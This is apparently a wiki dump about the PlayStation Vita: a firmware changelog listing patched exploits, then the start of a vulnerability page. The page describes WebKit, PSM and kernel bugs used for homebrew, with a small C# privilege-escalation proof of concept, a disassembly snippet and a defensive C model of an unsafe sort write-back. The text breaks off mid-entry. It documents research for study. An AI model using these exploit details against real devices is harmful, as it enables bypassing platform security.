* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />First found on October 10, 2013<br /><small>''Pre-installed Only''</small><br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several game exploits (Fieldrunners and others, some of them previously undisclosed) were fixed, disallowing the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various known exploit titles were fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles were fixed as well.<br />
* Internal firmware changes now prevent the execution of larger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* The full array of languages has been added to [External Keyboard] settings (previously Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network.<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the 256MB of memory reserved for the operating system is now free for games.<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploits.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*[Placeholder for Sony's "release notes"]<br />
*Fixed some bugs in SceNgs.<br />
*SSL library updated (along with other networking libraries that use SceSsl); two new root certificates added.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=8909Vulnerabilities2018-09-11T14:26:10Z<p>Xyz: /* h-encore kernel exploit */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> which uses type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, in the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
A heap buffer overflow exists in WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, corrupting the heap.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
https://blog.xyz.is/2016/webkit-360.html<br />
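<br />
The 536 bug (compare function shrinks the array, trailing items land past the end of the buffer) and the 537.73 bug (toString reallocates the array, sorted items land in the freed buffer) are the same defect: native code caches a pointer and a length, hands control to script, and then stores through the cached values. The C model below is an added example, not code from this page or from WebKit. The unsafe write-back is run dry, counting the stores that would have gone past the container's current end or through a pointer the callback replaced, beside a sort that works on a private copy and writes back only through the container's current pointer and length. The Arr type, the callback and the sample data are constructed for the example.<br />
<br />
```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Model of an engine-managed array whose backing store a script callback
 * may shrink or relocate while native code is in the middle of a sort. */
typedef struct {
    int *vec;
    size_t len;
} Arr;

typedef int (*cmp_fn)(Arr *a, int x, int y);

/* Insertion sort over a private buffer; every comparison runs the callback,
 * which is allowed to mutate the container the buffer was copied from. */
static void sort_copy(int *buf, size_t n, Arr *a, cmp_fn cmp) {
    for (size_t i = 1; i < n; i++) {
        int v = buf[i];
        size_t j = i;
        while (j > 0 && cmp(a, buf[j - 1], v) > 0) {
            buf[j] = buf[j - 1];
            j--;
        }
        buf[j] = v;
    }
}

/* Unsafe pattern (dry run): pointer and length are cached before the sort
 * and the sorted items would be written back through them afterwards.
 * Instead of performing the stores, count how many would land past the
 * container's current end (overflow) or go through a pointer the callback
 * has replaced (store into freed memory). */
size_t unsafe_writeback_violations(Arr *a, cmp_fn cmp) {
    int *cached_vec = a->vec;
    size_t cached_len = a->len;
    int *tmp = malloc(cached_len * sizeof *tmp);
    if (!tmp) return 0;
    memcpy(tmp, cached_vec, cached_len * sizeof *tmp);
    sort_copy(tmp, cached_len, a, cmp);

    size_t violations = 0;
    for (size_t i = 0; i < cached_len; i++) {
        if (a->vec != cached_vec || i >= a->len)
            violations++;   /* cached_vec[i] = tmp[i] would be a bad store */
    }
    free(tmp);
    return violations;
}

/* Hardened pattern: sort a private copy, then re-read the container and
 * write back only as many items as still fit, through the current pointer. */
size_t safe_sort(Arr *a, cmp_fn cmp) {
    size_t n = a->len;
    int *tmp = malloc(n * sizeof *tmp);
    if (!tmp) return 0;
    memcpy(tmp, a->vec, n * sizeof *tmp);
    sort_copy(tmp, n, a, cmp);

    size_t writable = a->len < n ? a->len : n;    /* length as of now */
    memcpy(a->vec, tmp, writable * sizeof *tmp);  /* pointer as of now */
    free(tmp);
    return writable;
}

/* Constructed hostile callback: on its first invocation it shrinks the array
 * to two elements and reallocates the backing store, as a script's compare
 * function or toString can. */
int shrinking_cmp(Arr *a, int x, int y) {
    if (a->len > 2) {
        a->len = 2;
        a->vec = realloc(a->vec, 2 * sizeof *a->vec);
    }
    return (x > y) - (x < y);
}

/* Build a five-element array (constructed sample data), run one of the two
 * patterns against the shrinking callback and return its result. */
size_t demo(int use_safe) {
    Arr a;
    a.len = 5;
    a.vec = malloc(a.len * sizeof *a.vec);
    const int init[5] = {5, 1, 4, 2, 3};
    memcpy(a.vec, init, sizeof init);
    size_t r = use_safe ? safe_sort(&a, shrinking_cmp)
                        : unsafe_writeback_violations(&a, shrinking_cmp);
    free(a.vec);
    return r;
}
```
<br />
The decisive difference is that the hardened path never trusts a pointer or length captured before script ran; everything it stores through is read again after the last callback returns.<br />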
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== h-encore savedata exploit ===<br />
<br />
To be disclosed by TheFloW.<br />
<br />
Discovered on 2018-02-17. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patched yet).<br />
<br />
=== h-encore userland ASLR bypass ===<br />
<br />
To be disclosed by TheFloW.<br />
<br />
Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patched yet).<br />
<br />
== System ==<br />
<br />
== Kernel ==<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
(2014-09-16)<br />
<pre><br />
might have found one<br />
SceSblDmac5Mgr_sceSblDmac5EncDec<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernel<br />
R10 comes from original read in buffer+0x10<br />
bad news is it got patched in 1.80<br />
they also added a isShell check<br />
</pre><br />
<br />
'''Consensus''': Confirmed exploitable before 1.80. YEAH!<br />
<br />
=== sceIoDevctl does not clear stack buffer ===<br />
(2014-11-24)<br />
Call some functions that interest you in a kernel context (i.e. make some syscalls), then call devctl and get up to 0x3FF bytes of that kernel stack back!<br />
<br />
<source lang="c"><br />
